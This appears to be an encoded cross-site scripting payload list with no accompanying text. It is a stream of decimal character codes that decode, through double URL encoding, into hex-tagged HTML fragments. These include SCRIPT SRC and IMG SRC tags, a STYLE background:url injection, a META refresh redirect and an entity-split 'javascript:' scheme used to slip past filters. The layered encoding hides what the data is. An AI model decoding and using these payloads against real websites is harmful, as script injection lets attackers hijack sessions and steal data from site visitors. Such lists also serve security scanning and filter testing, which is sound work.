53,48,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,54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6,52,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,51,50,37,50,53,50,67,49,49,54,37,50,53,50,67,49,50,49,37,50,53,50,67,49,49,50,37,50,53,50,67,49,48,49,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,50,48,37,50,53,50,67,49,49,54,37,50,53,50,67,52,55,37,50,53,50,67,57,57,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,53,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,54,54,37,50,53,50,67,55,57,37,50,53,50,67,54,56,37,50,53,50,67,56,57,37,50,53,50,67,49,50,51,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,49,48,55,37,50,53,50,67,49,48,51,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,56,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,56,37,50,53,50,67,52,48,37,50,53,50,67,51,52,37,50,53,50,67,49,48,48,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,51,52,37,50,53,50,67,52,49,37,50,53,50,67,49,50,53,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,55,54,37,50,53,50,67,54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1,51,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,57,49,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,50,37,50,53,50,67,51,50,37,50,53,50,67,49,48,51,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,51,50,37,50,53,50,67,55,51,37,50,53,50,67,54,57,37,50,53,50,67,51,50,37,50,53,50,67,53,50,37,50,53,50,67,57,51,37,50,53,50,67,54,50,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,53,48,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,54,48,37,50,53,50,67,51,51,37,50,53,50,67,57,49,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,50,37,50,53,50,67,57,51,37,50,53,50,67,52,53,37,50,53,50,67,52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4,53,37,50,53,50,67,56,51,37,50,53,50,67,54,57,37,50,53,50,67,51,50,37,50,53,50,67,55,50,37,50,53,50,67,56,50,37,50,53,50,67,54,57,37,50,53,50,67,55,48,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,52,55,37,50,53,50,67,52,55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7,37,50,53,50,67,54,54,37,50,53,50,67,55,52,37,50,53,50,67,54,57,37,50,53,50,67,54,55,37,50,53,50,67,56,52,37,50,53,50,67,51,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,56,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,57,57,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,48,37,50,53,50,67,53,56,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,52,53,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,52,53,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,52,53,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,52,53,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,49,49,50,37,50,53,50,67,57,55,37,50,53,50,67,49,49,52,37,50,53,50,67,57,55,37,50,53,50,67,49,48,57,37,50,53,50,67,51,50,37,50,53,50,67,49,49,48,37,50,53,50,67,57,55,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,49,37,50,53,50,67,54,49,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,56,37,50,53,50,67,51,50,37,50,53,50,67,49,49,56,37,50,53,50,67,57,55,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,55,37,50,53,50,67,49,48,49,37,50,53,50,67,54,49,37,50,53,50,67,52,56,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,55,57,37,50,53,50,67,54,54,37,50,53,50,67,55,52,37,50,53,50,67,54,57,37,50,53,50,67,54,55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7,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,48,51,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,54,37,50,53,50,67,51,52,37,50,53,50,67,53,57,37,50,53,50,67,57,56,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,56,53,37,50,53,50,67,56,50,37,50,53,50,67,55,54,37,50,53,50,67,52,48,37,50,53,50,67,51,52,37,50,53,50,67,51,52,37,50,53,50,67,53,57,37,50,53,50,67,57,57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1,52,37,50,53,50,67,53,57,37,50,53,50,67,49,48,48,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,51,52,37,50,53,50,67,52,49,37,50,53,50,67,51,52,37,50,53,50,67,53,57,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,56,37,50,53,50,67,57,55,37,50,53,50,67,49,48,56,37,50,53,50,67,52,48,37,50,53,50,67,57,55,37,50,53,50,67,52,51,37,50,53,50,67,57,56,37,50,53,50,67,52,51,37,50,53,50,67,57,57,37,50,53,50,67,52,51,37,50,53,50,67,49,48,48,37,50,53,50,67,52,49,37,50,53,50,67,53,5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1,37,50,53,50,67,51,50,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,49,37,50,53,50,67,52,48,37,50,53,50,67,51,57,37,50,53,50,67,54,48,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,52,49,37,50,53,50,67,51,57,37,50,53,50,67,53,57,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,49,37,50,53,50,67,52,48,37,50,53,50,67,51,57,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,54,50,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,52,57,37,50,53,50,67,54,48,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,54,50,37,50,53,50,67,51,57,37,50,53,50,67,52,49,37,50,53,50,67,53,57,37,50,53,50,67,51,50,37,50,53,50,67,54,51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54,49,37,50,53,50,67,51,52,37,50,53,50,67,56,51,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,54,37,50,53,50,67,52,53,37,50,53,50,67,54,55,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,49,37,50,53,50,67,49,48,55,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,49,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,54,55,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,49,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,49,54,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,56,53,37,50,53,50,67,56,51,37,50,53,50,67,54,57,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,54,56,37,50,53,50,67,54,49,37,50,53,50,67,51,56,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,54,37,50,53,50,67,53,57,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,51,56,37,50,53,50,67,49,48,51,37,50,53,50,67,49,49,54,37,50,53,50,67,53,57,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,49,48,48,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,51,56,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,54,37,50,53,50,67,53,57,37,50,53,50,67,52,55,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,51,56,37,50,53,50,67,49,48,51,37,50,53,50,67,49,49,54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4,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,54,37,50,53,50,67,49,49,54,37,50,53,50,67,49,49,50,37,50,53,50,67,53,56,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,52,54,37,50,53,50,67,52,56,37,50,53,50,67,52,54,37,50,53,50,67,52,56,37,50,53,50,67,52,54,37,50,53,50,67,52,57,37,50,53,50,67,54,50,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,53,49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51,56,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,57,37,50,53,50,67,49,48,54,37,50,53,50,67,57,55,37,50,53,50,67,49,49,56,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,57,57,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,54,37,50,53,50,67,53,56,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,53,55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49,48,54,37,50,53,50,67,57,55,37,50,53,50,67,49,49,56,37,50,53,50,67,51,56,37,50,53,50,67,51,53,37,50,53,50,67,49,50,48,37,50,53,50,67,52,56,37,50,53,50,67,54,56,37,50,53,50,67,53,57,37,50,53,50,67,57,55,37,50,53,50,67,49,49,53,37,50,53,50,67,57,57,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,54,37,50,53,50,67,53,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,57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2,53,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,51,50,37,50,53,50,67,54,48,37,50,53,50,67,55,51,37,50,53,50,67,55,55,37,50,53,50,67,55,49,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,51,56,37,50,53,50,67,51,53,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,57,37,50,53,50,67,51,50,37,50,53,50,67,51,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50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2,53,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,51,50,37,50,53,50,67,54,48,37,50,53,50,67,55,51,37,50,53,50,67,55,55,37,50,53,50,67,55,49,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,51,5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4,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,54,50,37,50,53,50,67,57,55,37,50,53,50,67,54,49,37,50,53,50,67,52,55,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,53,50,37,50,53,50,67,52,55,37,50,53,50,67,57,55,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,54,37,50,53,50,67,52,48,37,50,53,50,67,57,55,37,50,53,50,67,52,54,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,52,49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2,53,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,51,50,37,50,53,50,67,51,52,37,50,53,50,67,53,57,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,49,48,48,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,53,57,37,50,53,50,67,52,55,37,50,53,50,67,52,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49,49,49,37,50,53,50,67,51,52,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,52,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,54,55,37,50,53,50,67,55,57,37,50,53,50,67,55,56,37,50,53,50,67,56,52,37,50,53,50,67,54,57,37,50,53,50,67,55,56,37,50,53,50,67,56,52,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,52,56,37,50,53,50,67,53,57,37,50,53,50,67,51,50,37,50,53,50,67,56,53,37,50,53,50,67,56,50,37,50,53,50,67,55,54,37,50,53,50,67,54,49,37,50,53,50,67,49,48,52,37,50,53,50,67,49,49,54,37,50,53,50,67,49,49,54,37,50,53,50,67,49,49,50,37,50,53,50,67,53,56,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,53,57,37,50,53,50,67,56,53,37,50,53,50,67,56,50,37,50,53,50,67,55,54,37,50,53,50,67,54,49,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,53,50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4,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,51,50,37,50,53,50,67,54,48,37,50,53,50,67,54,54,37,50,53,50,67,54,50,37,50,53,50,67,54,49,37,50,53,50,67,53,48,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,51,52,37,50,53,50,67,54,50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48,37,50,53,50,67,56,50,37,50,53,50,67,54,53,37,50,53,50,67,55,55,37,50,53,50,67,54,57,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55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3,53,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56,37,50,53,50,67,5